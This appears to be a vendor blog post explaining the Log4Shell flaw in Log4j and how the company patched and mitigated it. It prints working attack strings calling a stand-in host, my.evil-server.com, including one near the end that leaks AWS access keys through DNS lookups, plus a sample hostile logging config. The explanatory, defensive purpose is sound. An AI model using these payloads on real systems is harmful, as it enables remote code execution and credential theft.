
What is Log4J and how did PaperCut handle it?

First thing, if you haven’t patched some software for Log4Shell yet… Do that now. I’ll wait.

Some context around security vulnerabilities

Bugs in commonly used software libraries (reusable packages of code that developers use to make things easier for themselves) are generally amongst the worst vulnerabilities that you can get.

This is for a couple of reasons: they affect lots of different software vendors at once, and those vendors often only find out about the problem when it becomes public.

So patches usually aren’t immediately available for most of the affected software. It becomes a race: software vendors scramble to get fixes in place before attackers leverage the bug for widespread exploitation, i.e. everyone gets hacked.

Quick history of the Log4Shell exploit

At the end of 2021, Chen Zhaojun, part of the security team at Chinese cloud giant Alibaba, found a defect in the popular Java logging library Log4j and disclosed it to the responsible team at the Apache Software Foundation. An initial patch was issued for what was going to be called Log4Shell, or CVE-2021-44228 to give it its official name.

The initial disclosure was immediately concerning: if you could get a certain string logged by the Log4j logging library, you could get Remote Code Execution (RCE), a security term for being able to run a program on someone else’s computer from your hacker lair.

The string was of the format “${jndi:ldap://my.evil-server.com/a}”.

Breaking this down:

  • the ${…} is telling Log4J that it should process whatever is inside the braces specially
  • “jndi:” means use a JNDI lookup
  • “ldap://my.evil-server.com/a” is telling the LDAP JNDI service provider to connect out to an LDAP server and do what that LDAP record says.
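To make that concrete, here’s a toy sketch in Java of the kind of lookup substitution a vulnerable message formatter performs. This is not Log4j’s actual code (the class and handler names here are invented for illustration); it just shows the shape of the problem: the formatter scans the message for `${prefix:target}` tokens and hands them to handlers, which is exactly where attacker-controlled data turns into an instruction.

```java
import java.util.Map;
import java.util.function.Function;

public class LookupSketch {
    // Toy stand-ins for the real lookup plugins ("jndi", "env", ...).
    // In vulnerable Log4j, the "jndi" handler performed a live JNDI/LDAP
    // lookup here; we just record what it would have done.
    static final Map<String, Function<String, String>> LOOKUPS = Map.of(
        "jndi", target -> "[would connect to " + target + "]",
        "env",  target -> "[value of $" + target + "]"
    );

    // Expand the first ${prefix:target} token found in a log message.
    static String expand(String message) {
        int start = message.indexOf("${");
        if (start < 0) return message;                    // nothing to expand
        int end = message.indexOf('}', start);
        if (end < 0) return message;
        String token = message.substring(start + 2, end); // e.g. "jndi:ldap://..."
        int colon = token.indexOf(':');
        if (colon < 0) return message;
        Function<String, String> handler = LOOKUPS.get(token.substring(0, colon));
        if (handler == null) return message;
        String replacement = handler.apply(token.substring(colon + 1));
        return message.substring(0, start) + replacement + message.substring(end + 1);
    }
}
```

Expanding a message like `UA: ${jndi:ldap://my.evil-server.com/a}` makes the issue obvious: the logger is treating part of a log message as a command rather than as data.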

JNDI (Java Naming and Directory Interface) is a standard interface for Java programs to interact with directory or naming services. It allows these programs to do naming or directory lookups through a common framework. Typically LDAP or DNS is used.

LDAP (for those that don’t know) stands for Lightweight Directory Access Protocol. It is generally used for looking up users in an organization but can be used for any kind of directory service. The JNDI LDAP provider includes functionality for the LDAP server to return a record that instructs JNDI to download a class file and load it. There is a Black Hat presentation that shows why this is a bad thing.

To recap, the logging library processed log messages to allow lookups that could cause the application to reach out via LDAP for information on where to get an attacker-controlled Java class from and load it.

So we have two really concerning attributes:

  • the logging library is parsing log messages for special commands
  • the naming lookup will download and run arbitrary code from some computer somewhere.

This is really bad. So bad it got a CVSS (Common Vulnerability Scoring System) score of 10 out of 10.

What makes it worse is that getting a web application to log a string is usually trivial, and user-supplied strings get logged all over the place. In fact, some security researchers were getting “hits” on their test attacks hours later, as the content was presumably processed by backend systems.

How did PaperCut respond to Log4J?

In this situation, the first thing you want to know is, “Do we use this library? Do we use it in a way that exposes the vulnerability?” For us, the answer to both was a very simple yes.

The next question you have to ask is, “What do I tell my customers to do right now to make them safe?” This is a key question with critical-severity bugs: you may not be able to deliver a patch quickly enough to keep your customers safe before someone starts trying to drop cryptominers on their systems.

Luckily, with this one, there was a configuration option that enabled people to disable the most problematic aspects of the issue. Our lead developer was already testing that when I walked over to talk about it. So we put that out as a known issue within a couple of hours of the start of the investigation. We then quickly created a standalone page to track our efforts on the issue complete with a timeline for updates and an FAQ section.
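The article doesn’t spell out which mitigation was used, but the widely publicized configuration-based mitigations for CVE-2021-44228 at the time looked roughly like this (the jar name is illustrative):

```
# For Log4j 2.10+: disable message lookups via a JVM system property...
java -Dlog4j2.formatMsgNoLookups=true -jar your-app.jar

# ...or via an environment variable
LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# Belt and braces: remove the JndiLookup class from the jar entirely
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```

Worth noting: the no-lookups flag was later found to be insufficient in certain non-default configurations (CVE-2021-45046), which is one reason patching was still essential.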

Next of course was the patch. We bumped the version and ran it through testing, then bumped the version again when a new Log4J was released. We then pushed out a patch and alerted our channel to it so they could help their customers.

All done and finished, you would think? Well, no. High-profile security vulnerabilities in software libraries have a lifecycle to them. They start with the initial bug being announced and then all the security researchers flock to the library to find new vulnerabilities or bypasses for the original fix.

This inevitably means that further issues come up and need to be addressed. For Log4Shell, at least one more issue was found and another iteration of the patch had to be released. Issues were also found in the older version of Log4j, which caused some concern due to the warnings from some vulnerability scanners.

While the issue exists in the older version of Log4j, it’s generally less of a problem. This is because the original problem was in interpreting the log messages themselves, whereas in the older version you have to be able to alter the configuration of the logger. That typically means being able to overwrite a file on the server running the application, and if you can do that, you can find plenty of other files to overwrite to compromise the server.
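For the curious, the best-known old-version issue (CVE-2021-4104, in Log4j 1.x’s JMSAppender) illustrates the point. An attacker would first need to plant a logging configuration along these hypothetical lines, because the JNDI lookup happens on a value read from the config, not from log messages:

```
# Hypothetical log4j 1.x properties file an attacker would need to write.
# JMSAppender performs a JNDI lookup on the binding names it is configured with.
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=ldap://my.evil-server.com/a
```

If you can already write this file on the server, you have easier ways in, which is why the 1.x issue scores lower.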

Going forward, we’re planning to update our software to remove the dependency on the old version of Log4j, eliminating these issues.

The wider impact of Log4Shell

This could have been a lot worse. If the initial bug had been in the old version of Log4j, it would have been very bad: one estimate puts usage of the older version at 10 times that of the new one. It’s also not trivial to migrate from the older version to the new one, potentially requiring code changes in the application rather than just bumping up to the latest library version and running tests.

Also, a lot of enterprise networks have egress filtering on their networks. So random Java apps making outbound LDAP calls are likely to be blocked. This limits the effectiveness of the remote code execution part of the issue.

There might not have been a configuration-based mitigation. If patching were the only way to prevent exploitation, then as a product provider you have to ask yourself, “Do we recommend that our customers turn our software off?” That’s a last resort and nothing a company wants to tell customers.

Hacking Java apps like this is not generally in the workflow of commodity attackers, ransomware crews, and so on. Cobalt Strike doesn’t come with a “hack Linux” button (though someone has apparently been working on it). This means that exploitation requires more effort and doesn’t always have a clear path to Domain Admin, which is generally the goal. That said, attacks against specific applications are likely to increase, so the danger is going to be in the applications that use Log4j and haven’t been patched.

Exposing credentials via this issue is probably going to be more of a headache for organizations that haven’t patched the software. With a lot of applications being migrated to the cloud and having credentials set via environment variables, you can leverage this vulnerability to extract them. A string like ${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.my.evil-server.com/a} would expose the access credentials for an AWS account: not via the LDAP request itself, but via the DNS resolution that happens before it. This is likely to get around some egress filtering controls.
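A toy illustration of why those nested env lookups are so dangerous. Again, this is not Log4j’s real code (the class and method are invented, and the environment map stands in for `System.getenv()`); it just shows that once environment-variable values are substituted into a hostname, the secrets leave the network inside an ordinary DNS query:

```java
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class EnvExfilSketch {
    // Replace every ${env:NAME} token in the message with the value from
    // the given environment map (a stand-in for System.getenv()).
    static String expandEnv(String message, Map<String, String> env) {
        Matcher m = Pattern.compile("\\$\\{env:([A-Z0-9_]+)\\}").matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String value = env.getOrDefault(m.group(1), "");
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }
}
```

After env expansion, the hostname the JNDI handler then tries to resolve contains the AWS keys, so the attacker’s DNS server sees them even if the follow-up LDAP connection is blocked.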

All of this means I expect Log4Shell to have a long tail, causing problems in new and “fun” ways for quite a while yet.